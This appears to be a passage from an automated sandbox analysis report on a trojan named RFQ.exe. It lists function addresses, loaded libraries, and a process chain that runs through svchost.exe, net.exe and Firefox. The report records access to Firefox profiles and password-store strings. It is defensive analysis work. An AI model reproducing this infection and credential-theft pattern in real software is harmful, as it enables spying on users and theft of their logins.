                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007396C00_2_007396C0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077B6CC0_2_0077B6CC
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0079F7FF0_2_0079F7FF
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007377B00_2_007377B0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007679C90_2_007679C9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074FA570_2_0074FA57
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00739B600_2_00739B60
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00737D190_2_00737D19
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074FE6F0_2_0074FE6F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00759ED00_2_00759ED0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00737FA30_2_00737FA3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_010672C00_2_010672C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A032_2_00418A03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0432_2_0042F043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031A02_2_004031A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102C32_2_004102C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C432_2_00416C43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C282_2_00401C28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C302_2_00401C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C3E2_2_00416C3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004014D02_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104E32_2_004104E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5632_2_0040E563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D212_2_00402D21
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D302_2_00402D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025DC2_2_004025DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025E02_2_004025E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DA3524_2_037DA352
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0372E3F04_2_0372E3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037E03E64_2_037E03E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037C02744_2_037C0274
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037A02C04_2_037A02C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037A81584_2_037A8158
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037BA1184_2_037BA118
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037101004_2_03710100
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D81CC4_2_037D81CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037E01AA4_2_037E01AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D41A24_2_037D41A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037B20004_2_037B2000
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037207704_2_03720770
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037447504_2_03744750
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0371C7C04_2_0371C7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0373C6E04_2_0373C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037205354_2_03720535
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037E05914_2_037E0591
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D24464_2_037D2446
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037C44204_2_037C4420
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037CE4F64_2_037CE4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DAB404_2_037DAB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D6BD74_2_037D6BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0371EA804_2_0371EA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037369624_2_03736962
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037229A04_2_037229A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037EA9A64_2_037EA9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037228404_2_03722840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0372A8404_2_0372A840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0374E8F04_2_0374E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037068B84_2_037068B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03794F404_2_03794F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03740F304_2_03740F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037C2F304_2_037C2F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03762F284_2_03762F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0372CFE04_2_0372CFE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03712FC84_2_03712FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0379EFA04_2_0379EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03720E594_2_03720E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DEE264_2_037DEE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DEEDB4_2_037DEEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03732E904_2_03732E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DCE934_2_037DCE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037BCD1F4_2_037BCD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0372AD004_2_0372AD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0371ADE04_2_0371ADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03738DBF4_2_03738DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03720C004_2_03720C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03710CF24_2_03710CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037C0CB54_2_037C0CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0370D34C4_2_0370D34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D132D4_2_037D132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0376739A4_2_0376739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037C12ED4_2_037C12ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0373B2C04_2_0373B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037252A04_2_037252A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0370F1724_2_0370F172
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037EB16B4_2_037EB16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0375516C4_2_0375516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0372B1B04_2_0372B1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D70E94_2_037D70E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DF0E04_2_037DF0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037CF0CC4_2_037CF0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037270C04_2_037270C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DF7B04_2_037DF7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037656304_2_03765630
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D16CC4_2_037D16CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D75714_2_037D7571
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037E95C34_2_037E95C3
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037BD5B04_2_037BD5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037114604_2_03711460
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DF43F4_2_037DF43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DFB764_2_037DFB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03795BF04_2_03795BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0375DBF94_2_0375DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0373FB804_2_0373FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03793A6C4_2_03793A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DFA494_2_037DFA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D7A464_2_037D7A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037CDAC64_2_037CDAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03765AA04_2_03765AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037BDAAC4_2_037BDAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037C1AA34_2_037C1AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037299504_2_03729950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0373B9504_2_0373B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037B59104_2_037B5910
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0378D8004_2_0378D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037238E04_2_037238E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DFF094_2_037DFF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_036E3FD54_2_036E3FD5
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_036E3FD24_2_036E3FD2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DFFB14_2_037DFFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03721F924_2_03721F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03729EB04_2_03729EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D7D734_2_037D7D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037D1D5A4_2_037D1D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03723D404_2_03723D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0373FDC04_2_0373FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03799C324_2_03799C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_037DFCF24_2_037DFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF1F804_2_02EF1F80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EECEA04_2_02EECEA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EED0C04_2_02EED0C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EEB1404_2_02EEB140
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF55E04_2_02EF55E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF38204_2_02EF3820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02EF381B4_2_02EF381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02F0BC204_2_02F0BC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357E3044_2_0357E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_035852244_2_03585224
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357E1E44_2_0357E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357D7684_2_0357D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0357E46C4_2_0357E46C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03767E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0379F290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03755130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0378EA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0370B970 appears 280 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 0075F8A0 appears 35 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 00756AC0 appears 42 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 0074EC2F appears 68 times
                Source: RFQ.exe, 00000000.00000003.2122123371.0000000003863000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe, 00000000.00000003.2129836248.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/9
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077CE7A GetLastError,FormatMessageW,0_2_0077CE7A
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076AB84 AdjustTokenPrivileges,CloseHandle,0_2_0076AB84
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0076B134
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0077E1FD
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00776532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00776532
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0078C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0078C18C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0073406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0073406B
                Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user\AppData\Local\Temp\autE5C3.tmpJump to behavior
                Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000004.00000003.2477498727.0000000003141000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4572237813.0000000003141000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4572237813.000000000314B000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4572237813.000000000316E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RFQ.exeReversingLabs: Detection: 29%
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
